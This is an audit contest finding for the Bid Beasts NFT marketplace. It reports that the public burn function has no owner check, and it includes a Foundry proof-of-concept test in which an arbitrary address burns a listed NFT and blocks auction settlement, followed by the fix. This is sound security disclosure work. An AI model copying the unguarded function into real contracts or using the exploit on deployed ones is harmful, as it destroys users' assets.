Bid Beasts

First Flight #49

Beginner FriendlyFoundrySolidityNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Missing authorization check for burn NFT

gaurangbrdv

Missing authorization check for burn NFT, results into loss of NFT of users while listing, unlisting, setteling auction.

Description

In the emarketplace every time when the user list, unlist, settle auction. The NFT will be transfered between user to protocol or protocol to user.
There is burn function in BidBeasts.sol which allows user to burn their NFT. But it should restrict to only owner of NFT. But the burn fnction is allowing anyone to burn any of the NFT

@> function burn(uint256 _tokenId) public {

_burn(_tokenId);

emit BidBeastsBurn(msg.sender, _tokenId);

}

Risk

Likelihood:

While listing the NFT, attacker can burn the nft before the seller list it
Hacker can burn nft from the market it self while unlisting or setteling the auction inside the market

Impact:

High impact to user who owns the NFT
High impact to bidder who will buy the NFT
High impact to protocol it self.

Proof of Concept

The following POC is only for setteling the auction, it can be modified for another impacts.

function test_anyoneCanmintNft() public {

address user = makeAddr("user");

address user2 = makeAddr("User2");

vm.deal(user2, 1 ether);

vm.prank(OWNER);

uint256 tokenId = nft.mint(user);

assertEq(nft.ownerOf(tokenId), user);

vm.startPrank(user);

nft.approve(address(market), tokenId);

market.listNFT(tokenId, 0.01 ether, 1 ether);

vm.stopPrank();

assertEq(market.getListing(tokenId).seller, user);

assertEq(nft.ownerOf(tokenId), address(market));

vm.startPrank(user2);

market.placeBid{value: 0.06 ether}(tokenId);

vm.stopPrank();

assertEq(market.getHighestBid(tokenId).bidder, user2);

vm.warp(block.timestamp + 16 minutes);

address hacker = makeAddr("hacker");

vm.prank(hacker);

nft.burn(tokenId);

vm.startPrank(user2);

vm.expectRevert();

market.settleAuction(tokenId);

vm.stopPrank();

assertEq(address(market).balance, 0.06 ether);

}

Recommended Mitigation

consider only the owner of the NFT can burn it. in the way only the owner of the NFT can burn it, instead of anyone can burn it. that will make protocol safe and prevent hacker from burning the NFT.

function burn(uint256 _tokenId) public {

+ require(msg.sender == ownerOf(_tokenId), "Not owner");

_burn(_tokenId);

emit BidBeastsBurn(msg.sender, _tokenId);

}

Updates

Lead Judging Commences

cryptoghost Lead Judge 2 months ago

Submission Judgement Published

Validated

Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.

Rewards breakdown

nSLOC

170

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!